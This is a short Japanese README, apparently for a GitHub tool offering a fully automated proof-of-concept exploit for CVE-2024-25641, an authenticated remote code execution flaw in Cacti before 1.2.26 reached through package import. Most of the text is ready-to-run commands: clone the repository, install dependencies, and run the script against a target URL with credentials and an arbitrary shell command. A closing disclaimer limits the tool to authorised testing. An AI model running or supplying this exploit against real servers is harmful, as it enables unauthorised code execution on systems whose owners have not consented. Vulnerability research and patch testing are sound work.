
完全自動化されたPoC - CVE-2024-25641 - RCE - Cacti < v1.2.26 🌵
認証済みRCECacti version < v1.2.26「パッケージインポート」機能を介して悪用可能な任意ファイル書き込みの脆弱性により、「テンプレートのインポート」権限を持つ認証済みユーザーが、Webサーバー上で任意のPHPコードを実行(RCE)できます。

git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26
pip install -r requirements.txt
python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26
poetry install
poetry run python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
このツールは教育およびテスト目的専用です。本ツールの作者は、本ツールを使用して行われる不正使用や違法行為について一切責任を負いません。このツールは、自分が所有するシステム、またはテストする明示的な許可を得たシステムでのみ使用してください。コンピュータシステムへの不正アクセスは違法かつ非倫理的です。